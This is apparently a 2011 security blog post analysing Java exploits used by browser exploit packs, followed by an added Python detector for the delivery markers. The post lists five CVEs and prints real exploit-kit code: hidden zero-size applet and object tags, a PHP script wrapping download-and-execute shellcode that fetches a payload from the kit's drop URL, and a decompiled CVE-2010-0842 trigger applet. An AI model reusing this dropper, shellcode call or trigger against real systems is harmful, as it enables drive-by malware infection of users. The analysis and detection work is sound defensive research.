Wednesday, May 4, 2011

Finest 5 - Java Exploits on Fire

Since browser exploit packs first appeared, we have noticed a serious change in their exploitation success ratio as new critical vulnerabilities have emerged. Recently, we have observed Browser Exploit Packs (BEPs) making explicit use of Java vulnerabilities. Java has become the most prominent exploitation vector nowadays. BEPs such as BlackHole and Phoenix use Java exploits explicitly to trigger infections. Consequently, the highest infection rate is an outcome of these Java exploits.

Because Java is platform independent, it is the attackers' preferred choice for attacking victim machines. The Java exploits that are on fire are as follows:

1. Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)

2. Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI

3. Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)

4. Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI

5. Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)


The latest addition to the Java exploits is CVE-2010-4452, a flaw that exists within the findClass method of the sun.plugin2.applet.Applet2ClassLoader class.

Serving these exploits is quite easy: the pack simply pushes a Jar file, as follows:

[object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"]
[PARAM name="launchjnlp" value="1"]
[PARAM name="docbase" value="]
[/object]
[embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="';

include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec ($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSËm' . ' ' . '' . '' . 'ITLŸ±µ
~ûpœ†þ°5' . '“â^Þ÷' . 'ÿ' . '' . '8ÿ ÉPQRSVW' . $shellcode;
header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header ('Cache-Control: no-cache');
header ('Pragma: no-cache');
header ('Accept-Ranges: bytes');
header ('Content-Length: ' . strlen ($rmf) . '');
header ('Content-Disposition: inline; filename=midi20100842.rmf');
header ('');
header ('Content-Type: application/x-msdownload');


So we cannot ignore how easily malware spreads through the exploitation of Java vulnerabilities. For example, consider the exploit trigger below:

include_once 'config.php';
echo ' [Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"]
[PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
[/applet]';


On decompiling Java-2010-0842.jar, we get:

import java.applet.Applet;
import java.io.*;
import javax.sound.midi.*;

public class ToolsDemo extends Applet
{
    public ToolsDemo(){}

    public void init()
    {
        String s = getParameter("URL");
        try
        {
            InputStream inputstream = getClass().getResourceAsStream(s);
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
            byte abyte0[] = new byte[1024];
            int i;
            while((i = inputstream.read(abyte0)) != -1)
                bytearrayoutputstream.write(abyte0, 0, i);
            ByteArrayInputStream bytearrayinputstream = new ByteArrayInputStream(bytearrayoutputstream.toByteArray());
            ToolsDemoSubClass toolsdemosubclass = new ToolsDemoSubClass();
            javax.sound.midi.MidiDevice.Info ainfo[] = MidiSystem.getMidiDeviceInfo();
            MidiDevice mididevice = MidiSystem.getMidiDevice(ainfo[0]);
            Sequencer sequencer = null;
            sequencer = (Sequencer)mididevice;
            sequencer.open();
            sequencer.setSequence(bytearrayinputstream);
            sequencer.addControllerEventListener(toolsdemosubclass, new int[] {
                0
            });
            sequencer.start();
        }
        catch(Exception exception) { }
    }

    public String getAppletInfo(){return "Tools Demo";}
}
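
As an added defender-side example (not from the original post or from any exploit pack), the Python sketch below flags the delivery markers shown above: zero-size applet, object and embed elements that load Java, and a .rmf file name served as application/x-msdownload. The function names, finding labels and sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
# classid taken from the page's [object] tag; all other names are illustrative.
JDT_CLASSID = "clsid:cafeefac-dec7-0000-0000-abcdeffedcba"

def _tiny(a):
    """True when width and height are both present and at most 1 pixel."""
    try:
        return int(a["width"]) <= 1 and int(a["height"]) <= 1
    except (KeyError, ValueError):
        return False

class JavaLoaderFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag and attribute names arrive lowercased
        if not _tiny(a):
            return  # visible elements are out of scope for this heuristic
        if tag == "applet":
            self.findings.append(("hidden-applet", a.get("archive") or a.get("code", "")))
        elif tag == "object" and a.get("classid", "").lower() == JDT_CLASSID:
            self.findings.append(("hidden-jdt-object", a["classid"]))
        elif tag == "embed" and a.get("type", "").lower() == "application/x-java-applet":
            self.findings.append(("hidden-java-embed", "launchjnlp" if "launchjnlp" in a else "applet"))

def scan_html(html):
    finder = JavaLoaderFinder()
    finder.feed(html)
    return finder.findings

def scan_headers(headers):
    """Flag a .rmf file name served as application/x-msdownload, as in the page's script."""
    h = {k.lower(): v for k, v in headers.items()}
    m = re.search(r'filename="?([^";]+)', h.get("content-disposition", ""))
    name = m.group(1).strip().lower() if m else ""
    bad_type = h.get("content-type", "").lower().startswith("application/x-msdownload")
    return [("type-mismatch", name)] if name.endswith(".rmf") and bad_type else []

# Constructed sample input (not captured traffic); .invalid is a reserved TLD.
SAMPLE_HTML = """<applet code="Demo.class" archive="http://kit.invalid/a.jar" width="0" Height="1"></applet>
<object classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"></object>
<embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="x">
<applet code="Clock.class" width="300" height="200"></applet>"""
SAMPLE_HEADERS = {"Content-Type": "application/x-msdownload", "Content-Disposition": "inline; filename=sample.rmf"}
if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML) + scan_headers(SAMPLE_HEADERS))
```

These are triage heuristics for proxy or crawler output; a hit marks a page for review rather than proving exploitation.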


Something is really on fire :)